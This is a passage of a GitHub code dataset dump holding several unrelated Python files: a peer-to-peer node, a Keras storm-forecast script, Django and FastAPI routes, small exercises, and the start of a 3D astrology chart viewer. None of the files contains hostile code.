host, port=PORT):\n\n if not self.check_ip_to_connect(host):\n self.debug_print(\"connect_to: Cannot connect!!\")\n return False\n\n if len(self.nodes_connected) >= self.max_peers:\n self.debug_print(\"Peers limit reached.\")\n return True\n\n for node in self.nodes_connected:\n if node.host == host:\n print(\"[connect_to]: Already connected with this node.\")\n return True\n\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((host, port))\n\n sock.send(self.id.encode(\"utf-8\"))\n connected_node_id = sock.recv(1024).decode(\"utf-8\")\n\n if self.id == connected_node_id:\n 
self.debug_print(\"Possible own ip: \" + host)\n if ipaddress.ip_address(host).is_private:\n self.local_ip = host\n else:\n self.ip = host\n self.banned.append(host)\n sock.close()\n return False\n\n thread_client = self.create_new_connection(sock, connected_node_id, host, port)\n thread_client.start()\n self.nodes_connected.append(thread_client)\n self.node_connected(thread_client)\n\n except Exception as e:\n self.debug_print(\"connect_to: Could not connect with node. (\" + str(e) + \")\")\n\n def create_new_connection(self, connection, id, host, port):\n return NodeConnection(self, connection, id, host, port)\n\n def stop(self):\n self.terminate_flag.set()\n\n def run(self):\n self.pinger.start()\n while not self.terminate_flag.is_set():\n try:\n connection, client_address = self.sock.accept()\n\n connected_node_id = connection.recv(2048).decode(\"utf-8\")\n connection.send(self.id.encode(\"utf-8\"))\n\n if self.id != connected_node_id:\n thread_client = self.create_new_connection(\n connection,\n connected_node_id,\n client_address[0],\n client_address[1],\n )\n thread_client.start()\n\n self.nodes_connected.append(thread_client)\n\n self.node_connected(thread_client)\n\n else:\n connection.close()\n\n except socket.timeout:\n pass\n\n except Exception as e:\n raise e\n\n time.sleep(0.01)\n\n self.pinger.stop()\n for t in self.nodes_connected:\n t.stop()\n\n self.sock.close()\n print(\"Node stopped\")\n\n def ConnectToNodes(self):\n for i in self.peers:\n if not self.connect_to(i, PORT):\n # delete wrong / own ip from peers\n del self.peers[self.peers.index(i)]\n\n def message(self, type, data, ex=[]):\n # time that the message was sent\n dict = {\"type\": type, \"data\": data}\n if \"time\" not in dict:\n dict[\"time\"] = str(time.time())\n\n self.network_send(dict, ex)\n\n def send_peers(self):\n self.message(\"peers\", self.peers)\n\n def check_validity(self, msg):\n if not (\"time\" in msg and \"type\" in msg and \"data\" in msg):\n return False\n\n return True\n\n def check_expired(self, dta):\n sth = str(dta)\n msghash = hashlib.md5(sth.encode(\"utf-8\")).hexdigest().decode()\n\n if float(time.time()) - float(dta[\"time\"]) < float(msg_del_time):\n if msghash not in self.msgs:\n self.msgs[msghash] = time.time()\n return False\n else:\n # if message is expired\n self.debug_print(\"expired:\" + dta[\"msg\"])\n return True\n\n def announce(self, dta, n):\n self.message(dta[\"type\"], dta[\"data\"], dta, ex=n)\n if len(self.msgs) > len(self.peers) * 20:\n for i in self.msgs.copy():\n if time.time() - self.msgs[i] > msg_del_time:\n del self.msgs[i]\n\n def data_handler(self, dta, n):\n if self.check_expired(dta):\n return False\n else:\n self.announce(dta, n)\n\n type = dta[\"type\"]\n data = dta[\"data\"]\n\n if type == \"peers\":\n # peers handling\n for i in data:\n if self.check_ip_to_connect(i):\n self.peers.append(i)\n\n self.debug_print(\"Known Peers: \" + str(self.peers))\n self.ConnectToNodes() # cpnnect to new nodes\n return True\n\n else:\n self.on_message(dta)\n\n def check_ip_to_connect(self, ip):\n if (\n ip not in self.peers\n and ip != \"\"\n and ip != self.ip\n and ip != self.local_ip\n and ip not in self.banned\n ):\n return True\n else:\n return False\n\n def on_message(self, data):\n self.debug_print(\"Incomig Message: \" + data)\n\n def on_connect(self, n):\n pass\n\n def loadstate(self, file=\"state.json\"):\n with open(file, \"r\") as f:\n peers = json.load(f)\n for i in peers:\n self.connect_to(i)\n\n def savestate(self, file=\"state.json\"):\n with open(file, 
\"w+\") as f:\n json.dump(self.peers, f)\n\n def node_connected(self, node):\n self.debug_print(\"node_connected: \" + node.id)\n if node.host not in self.peers:\n self.peers.append(node.host)\n self.send_peers()\n self.on_connect(node)\n\n def node_disconnected(self, node):\n self.debug_print(\"node_disconnected: \" + node.id)\n if node.host in self.peers:\n self.peers.remove(node.host)\n\n def node_message(self, node, data):\n try:\n json.loads(data)\n except json.decoder.JSONDecodeError:\n self.debug_print(f\"Error loading message from {node.id}\")\n return\n self.data_handler(json.loads(data), [node.host, self.ip])\n\n\nclass Pinger(threading.Thread):\n def __init__(self, parent):\n self.terminate_flag = threading.Event()\n super(Pinger, self).__init__()\n self.parent = parent\n self.dead_time = 30 # time to disconect from node if not pinged\n\n def stop(self):\n self.terminate_flag.set()\n\n def run(self):\n print(\"Pinger Started\")\n while not self.terminate_flag.is_set(): # Check whether the thread needs to be closed\n for i in self.parent.nodes_connected:\n i.send(\"ping\")\n time.sleep(20)\n print(\"Pinger stopped\")\n","repo_name":"GianisTsol/cryptocoin","sub_path":"cryptocoin/p2pbase.py","file_name":"p2pbase.py","file_ext":"py","file_size_in_byte":10066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"2285574018","text":"#!/usr/bin/env python\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LogNorm, ListedColormap,BoundaryNorm\n\nimport numpy as np\nimport datetime as dt\nimport os, pickle\nfrom scipy.ndimage.filters import gaussian_filter\nfrom scipy.stats import pearsonr\nimport pandas as pd\nfrom mpl_toolkits.basemap import *\nfrom sklearn.calibration import CalibratedClassifierCV, calibration_curve\nfrom sklearn import metrics\nfrom keras.models import Model, model_from_json, save_model, load_model\nfrom keras.layers import Dense, Activation, Conv2D, Input, AveragePooling2D, Flatten, LeakyReLU\nfrom keras.layers import Dropout, BatchNormalization\nfrom keras.regularizers import l2\nfrom keras.optimizers import SGD, Adam\nimport keras.backend as K\nimport tensorflow as tf\n\ndef computeSTP(row):\n lclterm = ((2000.0-row['MLLCL-potential_mean'])/1000.0)\n lclterm = np.where(row['MLLCL-potential_mean']<1000, 1.0, lclterm)\n lclterm = np.where(row['MLLCL-potential_mean']>2000, 0.0, lclterm)\n\n shrterm = (row['shr06']/20.0)\n shrterm = np.where(row['shr06'] > 30, 1.5, shrterm)\n shrterm = np.where(row['shr06'] < 12.5, 0.0, shrterm)\n\n stp = (row['SBCAPE-potential_mean']/1500.0) * lclterm * (row['SRH01-potential_mean']/150.0) * shrterm\n return stp\n\ndef read_csv_files():\n # read in all CSV files for 1km forecasts\n tdate = sdate\n all_files = []\n while tdate <= edate:\n yyyymmdd = tdate.strftime('%Y%m%d')\n csv_file = '/glade/work/sobash/NSC_objects/grid_data_ncarstorm_3km_csv_preprocessed/grid_data_NCARSTORM_d01_%s-0000.csv.gz'%(yyyymmdd)\n\n if os.path.exists(csv_file): all_files.append(csv_file)\n tdate += dateinc\n print('Reading %s files'%(len(all_files)))\n\n df = pd.concat((pd.read_csv(f, compression='gzip') for f in all_files))\n\n #if model == 'NSC': df['stp'] = df.apply(computeSTP, axis=1) \n\n #if model == 'NSC': df['datetime'] = pd.to_datetime(df['Valid_Date'])\n #if model == 'NCAR':\n df['datetime'] = pd.to_datetime(df['Date'])\n #df['Run_Date'] = pd.to_datetime(df['Date']) - pd.to_timedelta(df['fhr'])\n df['year'] = df['datetime'].dt.year\n df['month'] = df['datetime'].dt.month\n df['hour'] = df['datetime'].dt.hour\n df['dayofyear'] = df['datetime'].dt.dayofyear\n return df, len(all_files)\n\ndef brier_score_keras(obs, preds):\n return K.mean((preds - obs) ** 2)\n\ndef brier_skill_score_keras(obs, preds):\n climo = K.mean((obs - K.mean(obs)) ** 2)\n bs = brier_score_keras(obs, preds)\n ratio = (bs / climo)\n return climo\n\ndef auc(obs, preds):\n auc = tf.metrics.auc(obs, preds)[1]\n K.get_session().run(tf.local_variables_initializer())\n return auc\n \ndef normalize_multivariate_data(data, scaling_values=None):\n \"\"\"\n Normalize each channel in the 4 dimensional data matrix independently.\n\n Args:\n data: 4-dimensional array with dimensions (example, y, x, channel/variable)\n scaling_values: pandas dataframe containing mean and std columns\n\n Returns:\n normalized data array, scaling_values\n \"\"\"\n print(data.shape, data.dtype)\n normed_data = np.zeros(data.shape, dtype=data.dtype)\n scale_cols = [\"mean\", \"std\"]\n if scaling_values is None:\n scaling_values = pd.DataFrame(np.zeros((data.shape[-1], len(scale_cols)), dtype=np.float32),\n columns=scale_cols)\n for i in range(data.shape[-1]): scaling_values.loc[i, [\"mean\", \"std\"]] = [data[:, i].mean(), data[:, i].std()]\n\n for i in range(data.shape[-1]):\n normed_data[:, i] = (data[:, i] - scaling_values.loc[i, \"mean\"]) / 
scaling_values.loc[i, \"std\"]\n\n return normed_data, scaling_values\n\ndef plot_forecast(predictions, prefix=\"\"):\n #test = readNCLcm('MPL_Greys')[25::] + [[1,1,1]] + readNCLcm('MPL_Reds')[10::]\n #test = readNCLcm('perc2_9lev')[1::]\n #cmap = ListedColormap(test)\n cmap = plt.get_cmap('RdGy_r')\n norm = BoundaryNorm(np.arange(0,1.1,0.1), ncolors=cmap.N, clip=True)\n\n print(predictions)\n\n #awips = Basemap(projection='lcc', llcrnrlon=-133.459, llcrnrlat=12.19, urcrnrlon=-49.38641, urcrnrlat=57.2894, lat_1=25.0, lat_2=25.0, lon_0=-95, resolution='l', area_thresh=10000.)\n\n #fig, axes, m = pickle.load(open('/glade/u/home/sobash/NSC_scripts/ch_pk_files/rt2015_ch_CONUS.pk', 'r'))\n #fig, axes, m = pickle.load(open('/glade/u/home/sobash/NSC_scripts/dav_pk_files/rt2015_ch_CONUS.pk', 'rb'))\n fig, axes, m = pickle.load(open('rt2015_ch_CONUS.pk', 'rb')) \n\n lats, lons = predictions['lat'].values, predictions['lon'].values\n x, y = m(lons, lats)\n\n # do something convoluted here to only plot each point once\n probmax = {}\n for i,p in enumerate(predictions['predict_proba'].values):\n thiskey = '%f%f'%(lats[i],lons[i])\n if thiskey in probmax:\n if p > probmax[thiskey]:\n probmax[thiskey] = p\n else:\n probmax[thiskey] = p\n\n for i,p in enumerate(predictions['predict_proba'].values):\n thiskey = '%f%f'%(lats[i],lons[i])\n thisvalue = probmax[thiskey]\n\n color = cmap(norm([thisvalue])[0])\n probmax[thiskey] = -999\n if thisvalue >= 0.05:\n a = plt.text(x[i], y[i], int(round(thisvalue*100)), fontsize=10, ha='center', va='center', family='monospace', color=color, fontweight='bold')\n #a = m.scatter(x, y, s=50, c=predictions['predict_proba'].values, lw=0.5, edgecolors='k', cmap=cmap, norm=norm)\n\n # ADD COLORBAR\n #cax = fig.add_axes([0.02,0.1,0.02,0.3])\n #cb = plt.colorbar(a, cax=cax, orientation='vertical', extendfrac=0.0)\n #cb.outline.set_linewidth(0.5)\n #cb.ax.tick_params(labelsize=10)\n\n plt.savefig('forecast%s.png'%prefix)\n\nsdate = dt.datetime(2012,6,29,0,0,0)\nedate = dt.datetime(2012,6,29,0,0,0)\ndateinc = dt.timedelta(days=1)\ndf, numfcsts = read_csv_files()\n\nprint('Training random forest classifier')\n\nfeatures = ['fhr', 'dayofyear', 'lat', 'lon', 'UP_HELI_MAX', 'UP_HELI_MAX03', 'UP_HELI_MAX01', 'W_UP_MAX', 'W_DN_MAX', 'WSPD10MAX', 'MUCAPE', 'SHR06', 'MLCINH', 'MLLCL', 'SHR01', 'SRH01', 'SRH03', 'T2', 'TD2', 'PSFC','CAPESHEAR', 'STP', 'LR75']\nlarge_scale_features = ['U925','U850','U700','U500','V925','V850','V700','V500','T925','T850','T700','T500','TD925','TD850','TD700','TD500']\nneighbor_features = [ f+'-%s1'%n for f in large_scale_features for n in ['E','S','N','W'] ]\nneighbor_time_features = [ f+'-%s'%n for f in ['STP', 'CAPESHEAR', 'MUCAPE', 'SBCINH', 'MLLCL', 'SHR06', 'SHR01'] for n in ['TP1', 'TM1'] ]\nfeatures = features + large_scale_features + neighbor_features + neighbor_time_features\n\n# normalize data we want to use\nscaling_values = pickle.load(open('scaling_values.pk', 'rb'))\n\nnorm_in_data, scaling_values = normalize_multivariate_data(df[features].values, scaling_values=scaling_values)\n\n# load combined architecture and weights\ndense_model = load_model('neural_network.h5', custom_objects={'brier_score_keras': brier_score_keras, 'brier_skill_score_keras':brier_skill_score_keras, 'auc':auc })\n\npredictions_proba = dense_model.predict(norm_in_data)\nprint(predictions_proba.max())\nprint(predictions_proba) \n\n#labels: all, wind, hailone, torn\ndf['predict_proba'] = predictions_proba[:,1]\nforecast_mask = (df['fhr'] > 
12)\nplot_forecast(df[forecast_mask])\n","repo_name":"ahijevyc/machine-learning","sub_path":"neural_network_forecast_gridded.py","file_name":"neural_network_forecast_gridded.py","file_ext":"py","file_size_in_byte":7303,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"}
+{"seq_id":"9224681880","text":"import sys\n\ndef main():\n\tif len(sys.argv) > 1:\n\t\tfor i in range(1,len(sys.argv)):\n\t\t\tfilename = sys.argv[i]\n\t\t\tfile = open (filename, \"r\")\n\t\t\tcontent = file.read()\n\t\t\tprint (content)\n\t\t\tfile.close()\n\telse:\n\t\treturn \"Please enter a file\"\n\nif __name__ == '__main__':\n\tprint(main())\n","repo_name":"nsapundzhiev/HackBG","sub_path":"week2/ 2-File-System-Problems/cat2.py","file_name":"cat2.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"29781769565","text":"from django.urls import path, include\nfrom django.conf import settings\nfrom django.contrib.auth.views import LoginView, LogoutView\nfrom rest_framework import routers\n\nfrom .views import (index, admin, avatar, login_api, user_data_api, csrf_api, basic_medium_metadata,\n responsible_ticket_metadata, responsible_metadata, basic_medium_without_certificate_metadata,\n roles_metadata, generate_fixtures)\nfrom .api import (UserViewSet, BasicMediumExpedientViewSet, RequestTicketViewSet,\n MovementTicketViewSet, ResponsibilityCertificateViewSet)\n\n\n# Incluyo el enrutador de los ViewSet declarados para el API\nrouter = routers.SimpleRouter()\nrouter.register(r'users', UserViewSet)\nrouter.register(r'basic_medium', BasicMediumExpedientViewSet)\nrouter.register(r'request_ticket', RequestTicketViewSet)\nrouter.register(r'movement_ticket', MovementTicketViewSet)\nrouter.register(r'responsibility_certificate', ResponsibilityCertificateViewSet)\n\nurlpatterns = [\n # Default System urls\n path('', index, name='index'),\n path('admin/', admin, name='dashboard'),\n\n # Authentication urls\n path('login/', LoginView.as_view(), name='login'),\n path('logout/', LogoutView.as_view(), name='logout'),\n\n # API urls\n path('api/login/', login_api, name='api_login'),\n path('api/avatar/', avatar, name=\"avatar\"),\n path('api/csrf/', csrf_api, name=\"csrf_api\"),\n path('api/user/', user_data_api, name=\"user_data\"),\n path('api/responsible/', responsible_metadata, name='responsible_list'),\n path('api/responsible_ticket/', responsible_ticket_metadata, name='responsible_ticket_list'),\n path('api/roles/', roles_metadata, name='roles_list'),\n path('api/mediums/', basic_medium_metadata, name='basic_medium_list'),\n path('api/mediums_certificate/', basic_medium_without_certificate_metadata, name='basic_medium_certificate_list'),\n path('api/', include(router.urls)),\n]\n\n# This is required for static files while in development mode. (DEBUG=TRUE)\nif settings.DEBUG:\n urlpatterns += [path('fixtures/', generate_fixtures)]\n","repo_name":"ISW-P5/Gestion-Medios-Basicos","sub_path":"system/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"16298642126","text":"from fastapi import APIRouter, HTTPException\nfrom automart.models import VehicleMake, VehicleModel\nfrom automart.schemas import VehicleMakeView, VehicleModelView\nfrom automart.lib.nhtsa import fetch_make_models\n\nrouter = APIRouter(\n prefix=\"/vehicle-make\",\n tags=[\"Vehicle Makes\"],\n)\n\n\n@router.get(\"/\", response_model=list[VehicleMakeView])\nasync def get_vehicle_makes(page: int = 0, perPage: int = 25):\n query = VehicleMake.select().limit(perPage).offset(page * perPage)\n vehicle_makes = [VehicleMakeView.from_orm(vehicle_makes) for vehicle_makes in query]\n return vehicle_makes\n\n\n@router.get(\"/{make_id}\", response_model=None)\nasync def get_vehicle_make(vehicle_make_id: int):\n vehicle_make = VehicleMake.get_by_id(vehicle_make_id)\n\n if not vehicle_make:\n raise HTTPException(status_code=404)\n\n return VehicleMakeView.from_orm(vehicle_make)\n\n\n@router.get(\"/{make_id}/models\", response_model=list[VehicleModelView])\nasync def get_vehicle_models_by_make(vehicle_make_id: int):\n query = (\n VehicleModel.select().where(VehicleMake.id == vehicle_make_id).join(VehicleMake)\n )\n vehicle_makes = [\n VehicleModelView.from_orm(vehicle_makes) for vehicle_makes in query\n ]\n return vehicle_makes\n","repo_name":"jloiola/automart","sub_path":"automart/routes/vehicle_make.py","file_name":"vehicle_make.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"8359123435","text":"print(\"\\nCalculate the Greatest Common Divisor of two Integers: \\n\")\na = int(input(\"Enter first integer: \"))\nb = int(input(\"Enter second integer: \"))\nx, y = a, b\nif a == 0:\n gcd = 0 #I didn't know that 0 could be considered as a divisor,\n #the logic behind this if statement from the pseudo-algorithm is unclear\nelse:\n while b != 0:\n if a > b:\n a = a - b\n else:\n b = b - a\n gcd = a\n\nprint(\"\\ngcd(\"+ str(x)+ \", \"+ str(y)+\") = \" +str(gcd))\n\n","repo_name":"dankodak/Programmierkurs","sub_path":"Abgaben/Blatt 2/Aufgabe 2/Team 42164/Ben Romdhane_Houssem_HoussemBenRomdhane_755653/Ueb2_Auf2_HoussemBenRomdhane.py","file_name":"Ueb2_Auf2_HoussemBenRomdhane.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"18756686206","text":"import numpy as np\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfrom mpl_toolkits.mplot3d import proj3d\r\nfrom matplotlib.lines import Line2D\r\nfrom matplotlib.widgets import TextBox,RadioButtons\r\nfrom matplotlib.widgets import Button as widgets_Button\r\nfrom matplotlib.offsetbox import AnchoredText\r\nfrom matplotlib.backends.backend_tkagg import (FigureCanvasTkAgg, NavigationToolbar2Tk)\r\nfrom matplotlib.figure import Figure\r\nfrom matplotlib.patches import Circle, Wedge\r\nimport mpl_toolkits.mplot3d.art3d as art3d\r\n\r\nimport matplotlib.animation as animation\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter.filedialog import asksaveasfilename\r\nfrom tkinter import messagebox \r\n\r\nfrom calc_pl import *\r\nfrom help_windowAstron3D import *\r\nfrom func_tools import *\r\n\r\n#import keyboard\r\n\r\n\r\n\r\nclass c:\r\n planets={\"Sun\" : \"☉\", \"Moon\" : \"☽\", \"Mercury\" : \"☿\", \"Venus\" : \"♀\", \"Mars\" : \"♂\", \"Jupiter\" : \"♃\", \"Saturn\" : \"♄\", \"Uranus\" : \"♅\", \"Neptune\" : \"♆\", \"Pluto\" : \"♇\", \"Node_N\" : \"☊\", \"Node_S\" : \"☋\"}\r\n planets2=[\"Sun\", \"Moon\", \"Mercury\", \"Venus\", \"Mars\", \"Jupiter\", \"Saturn\", \"Uranus\", \"Neptune\", \"Pluto\", \"Node_N\", \"Node_S\", \"Asc\", \"MC\"]\r\n\r\nhouses_names=[\"\",\"I\", \"II\", \"III\", \"IV\", \"V\", \"VI\", \"VII\", \"VIII\", \"IX\", \"X\", \"XI\", \"XII\"]\r\nzodiac = [\"\",\"Aries\", \"Taurus\", \"Gemini\", \"Cancer\", \"Leo\", \"Virgo\", \"Libra\", \"Scorpio\", \"Sagittarius\", \"Capricorn\", \"Aquarius\", \"Pisces\"] \r\nzodiac2 = [\"\", \"♈\", \"♉\", \"♊\", \"♋\", \"♌\", \"♍\", \"♎\", \"♏\", \"♐\", \"♑\", \"♒\", \"♓\"]\r\n\r\ncolor_ecl=\"#A9A54B\"\r\ncolor_ecl_zod=\"#767109\"\r\ncolor_oran=\"#F38600\"\r\ncolor_yel=\"#EFC300\"\r\npl_colors={\"Sun\" : \"#F2C500\", \"Moon\" : \"#FF8D00\", \"Mercury\" : \"#008CD2\", \"Venus\" : \"#098100\", \"Mars\" : \"#AA0000\", \"Jupiter\" : \"#6E8CA5\", \"Saturn\" : \"#874400\", \"Uranus\" : \"#1900D6\", \"Neptune\" : \"#006695\", \"Pluto\" : \"#6D00A0\", \"Node_N\" : \"#333\", \"Node_S\" : \"#333\"} \r\n\r\nmain_circles_clickable = True # ecliptic, equator, horizon, prime vertical\r\nmain_circles_picker = 2 if main_circles_clickable == True else 0\r\n\r\ndata_pts=50\r\n\r\nclass astro3D():\r\n def __init__(self, parent,frame, planets_data, geo_latitude, data={}): #timestamp=0\r\n self.parent=parent\r\n bgr_col=\"#E0EFF0\"\r\n self.fig = Figure(figsize=(11,8), dpi=100, facecolor = bgr_col)\r\n self.ax = self.fig.add_subplot(111, projection='3d', facecolor = bgr_col)\r\n\r\n at = AnchoredText(\"Astronomia 3D by Popiel\", loc=\"lower right\",bbox_to_anchor=(0.9, 0.195), frameon=False,borderpad=0, prop=dict(alpha=0.2,size=13,color=\"#78A1A4\",fontfamily=\"Lucida Handwriting\"),bbox_transform=self.ax.transAxes)\r\n at.set_zorder(0)\r\n self.ax.add_artist(at)\r\n\r\n #================ \r\n\r\n size900=size760=False\r\n screenHeight = parent.winfo_screenheight()\r\n if screenHeight<880:size900=True\r\n if screenHeight<780:size760=True;size900=False\r\n\r\n f_w=11;f_h=8\r\n if size900==True: dd=0.93;self.fig.set_size_inches(f_w*dd, f_h*dd);\r\n elif size760==True: dd=0.80;self.fig.set_size_inches(f_w*dd, f_h*dd);\r\n\r\n #================ \r\n\r\n self.ids={}\r\n self.equat_ids=[]\r\n self.ecl_ids=[]\r\n self.pl_ids=[]\r\n self.leg_obj={}\r\n self.leg_items_ids=[]\r\n self.ecliptic_scale={}\r\n self.equator_scale={}\r\n\r\n\r\n #========== fix distorted circles (shown as ovals) ======\r\n limits = 
self.ax.get_w_lims()\r\n self.ax.set_box_aspect((limits[1]-limits[0],limits[3]-limits[2],limits[5]-limits[4]))\r\n #===============\r\n\r\n self.fig.subplots_adjust(left=-0.2, bottom=-0.3, right=0.95, top=1.25, wspace=None, hspace=None) #margins\r\n\r\n self.planets_data=planets_data\r\n self.geo_latitude=geo_latitude\r\n self.data=data\r\n self.timestampIni = self.data[\"timestamp\"]\r\n\r\n self.ε=23.44\r\n self.ε=self.data[\"obliquity\"]\r\n self.trueNode=data[\"trueNode\"]\r\n\r\n\r\n self.txt1=[0.87,0.206]\r\n self.prop_txt1={\"color\":'#333', \"fontsize\":8}\r\n self.id_text = self.ax.text2D(*self.txt1, \"\", **self.prop_txt1, transform=self.ax.transAxes)\r\n\r\n self.txt_name=[0.2,0.818]\r\n self.txt_time=[0.913,0.29]\r\n self.txt_time2=[0.911,0.26]\r\n self.txt1=[0.18,0.206]\r\n self.txt2=[0.41,0.206]\r\n self.txt3=[0.18,0.230]\r\n\r\n if size760==True:\r\n self.txt_time=[0.917+0.09,0.28]\r\n self.txt_time2=[0.915+0.09,0.25]\r\n elif size900==True:\r\n self.txt_time=[0.917+0.02,0.29]\r\n self.txt_time2=[0.915+0.02,0.26]\r\n\r\n bgr_col_bb1=\"#2D6266\"\r\n bgr_col_bb3=\"#70ADB2\"\r\n bgr_col_bb2=\"#EFE9DD\" \r\n PAGE_BG1 = \"#134752\"\r\n bgr_col_bb1=PAGE_BG1\r\n COL_2=\"#AA0000\"\r\n COL_3=\"#AB1D00\"\r\n bgr_col_bb3=\"#C4D4D5\" #blue\r\n\r\n\r\n self.prop_txt1={\"color\":'#333', \"fontsize\":8}\r\n self.prop_txt2={\"bbox\": dict(boxstyle=\"round\", facecolor=bgr_col_bb2, ec=\"#CEEFF1\", pad=0.3, alpha=0.8), \"color\":\"#333\", \"fontsize\":9 }\r\n col_4=\"#001D4B\"\r\n self.prop_txt3={\"bbox\": dict(boxstyle=\"round\", facecolor=bgr_col_bb3, ec=\"#CAE2E3\", pad=0.3, alpha=0.84), \"color\":col_4, \"fontsize\":10, \"fontweight\":400, \"fontfamily\":\"Tahoma\"}\r\n\r\n self.prop_txt_name={\"bbox\": dict(boxstyle=\"round\", facecolor=bgr_col_bb1, ec=\"#CEEFF1\", pad=0.4, alpha=0.9), \"color\":\"#EEEEEE\", \"fontsize\":10, \"fontweight\":800, \"alpha\":1}\r\n self.prop_txt_time={\"bbox\": dict(boxstyle=\"round\", facecolor=bgr_col_bb3, ec=\"#CAE2E3\", pad=0.5, alpha=0.84), \"color\":COL_3, \"fontsize\":10, \"fontweight\":600, \"fontfamily\":\"Consolas\"}\r\n self.prop_txt_time2={\"bbox\": dict(boxstyle=\"round\", facecolor=bgr_col_bb3, ec=\"#CAE2E3\", pad=0.4, alpha=0.74), \"color\":\"#333\", \"fontsize\":8, \"fontweight\":600, \"fontfamily\":\"Consolas\"}\r\n\r\n self.id_text = self.ax.text2D(*self.txt1, \"\", **self.prop_txt1, transform=self.ax.transAxes)\r\n self.id_text_2 = self.ax.text2D(*self.txt2, \"\", **self.prop_txt2, transform=self.ax.transAxes)\r\n self.id_text_3 = self.ax.text2D(*self.txt3, \"\", **self.prop_txt3, transform=self.ax.transAxes)\r\n\r\n help_x=1.036; help_y=0.2065\r\n if size760==True:help_x=1.036+0.126\r\n elif size900==True:help_x=1.036+0.035\r\n self.id_help_ico = self.ax.text2D(help_x, help_y, \"?\", c = \"#F6F6F6\", size = 10, fontweight = 800, picker=5, bbox = dict(boxstyle = \"circle\", edgecolor = \"#990000\",facecolor = \"#800000\",pad = 0.2), ha = \"left\", va = \"center\",alpha = 0.7, transform = self.ax.transAxes)\r\n\r\n #=============\r\n\r\n\r\n alpha_main=0.7\r\n self.alpha_main=alpha_main\r\n self.sw_cir_alpha=False\r\n\r\n self.ψ2 = np.linspace(-np.pi/2, np.pi/2, 100)\r\n self.w = np.array([0, -1, 0])\r\n\r\n #========== Horizon\r\n color_hor=\"#001440\"\r\n color_hor=\"#333333\"\r\n self.ψ = np.linspace(0, 2 * np.pi, 100)\r\n φ=self.ψ\r\n r=1\r\n x1=r * np.cos(φ)\r\n y1=r * np.sin(φ)\r\n z1=np.zeros(np.size(x1))\r\n \r\n '''\r\n #solid\r\n id_,=self.ax.plot(x1,y1,z1,color=color_hor,linewidth=2 ,picker=2)\r\n self.hor_circl=id_\r\n 
#id_=id(id_)\r\n self.ids[id(id_)] =[[x1[3],y1[3],z1[0]],\"Horizon\"]\r\n '''\r\n\r\n φ_1 = np.linspace(-np.pi/2, np.pi/2, 50)\r\n x1=r * np.cos(φ_1); y1=r * np.sin(φ_1); z1=np.zeros(np.size(x1));\r\n id_1, = self.ax.plot(x1,y1,z1 ,color=color_hor,picker=main_circles_picker, linewidth=1, linestyle = \"solid\", alpha=alpha_main)\r\n\r\n self.hor_circl_1=id_1\r\n self.ids[id(id_1)] =[[x1[20],y1[20],z1[0]],\"Horizon\"]\r\n\r\n φ_2 = np.linspace(np.pi/2,np.pi*3/2, 50)\r\n x1=r * np.cos(φ_2); y1=r * np.sin(φ_2); z1=np.zeros(np.size(x1));\r\n id_2, = self.ax.plot(x1,y1,z1 ,color=color_hor,picker=main_circles_picker, linewidth=1, linestyle = \"dashed\", alpha=alpha_main) \r\n\r\n self.hor_circl_2=id_2\r\n self.ids[id(id_2)] =[self.ids[id(id_1)][0],\"Horizon\"]\r\n\r\n\r\n #======== Prime vertical\r\n \r\n color_vert=\"#050835\"\r\n color_vert=color_hor\r\n θ=self.ψ\r\n\r\n '''\r\n #solid \r\n z2= r * np.cos(θ) \r\n x2= r * np.sin(θ)\r\n y2=np.zeros(np.size(x2))\r\n id_,=self.ax.plot(x2,y2,z2,color=color_vertlinewidth=1,picker=2 ) #\"#0009BC\"\r\n self.ids[id(id_)] =[[x2[20],y2[20],z2[20]],\"Prime Vertical\"] #\"v_rot+π/2\"\r\n self.prime_vert=id_\r\n '''\r\n φ_1 = np.linspace(0, np.pi, 50)\r\n x2=r * np.sin(φ_1); z2=r * np.cos(φ_1); y2=np.zeros(np.size(x2));\r\n id_1, = self.ax.plot(x2,y2,z2 ,color=color_vert, linewidth=1, linestyle = \"solid\", alpha=alpha_main,picker=main_circles_picker)\r\n\r\n self.prime_vert_1=id_1\r\n self.ids[id(id_1)] =[[x2[13],y2[13],z2[13]],\"Prime Vertical\"]\r\n\r\n φ_2 = np.linspace(np.pi,2*np.pi, 50)\r\n x2=r * np.sin(φ_2); z2=r * np.cos(φ_2); y2=np.zeros(np.size(x1));\r\n id_2, = self.ax.plot(x2,y2,z2 ,color=color_vert, linewidth=1, linestyle = \"dashed\", alpha=alpha_main,picker=main_circles_picker) \r\n\r\n self.prime_vert_2=id_2\r\n self.ids[id(id_2)] =[self.ids[id(id_1)][0], \"Prime Vertical\"]\r\n\r\n X,Y,Z =self.draw_axes()\r\n\r\n id_=self.ax.scatter(1, 0, 0, marker=\"o\",c=\"#265678\", s=9, zorder=0); \"#3B6D91\"\r\n self.ids[id(id_)] =[[1,0,0],\" φ=0, θ=0\"]\r\n self.start_pt=id_\r\n\r\n self.plot_circle_scale(\"Horizon\");\r\n self.plot_circle_scale(\"Prime vertical\")\r\n\r\n\r\n #================\r\n\r\n self.date_utc = self.data[\"d_utc\"]\r\n self.time_utc = self.data[\"t_utc\"]\r\n self.timestamp = self.data[\"timestamp\"]\r\n self.geo_longitude=float(self.data[\"lon\"])\r\n\r\n name = \" {} {} \".format(self.data[\"n\"], self.data[\"ln\"])\r\n time_utc = \" UTC: {: >10}, {: >8} \".format(self.data[\"d_utc\"], self.data[\"t_utc\"])\r\n 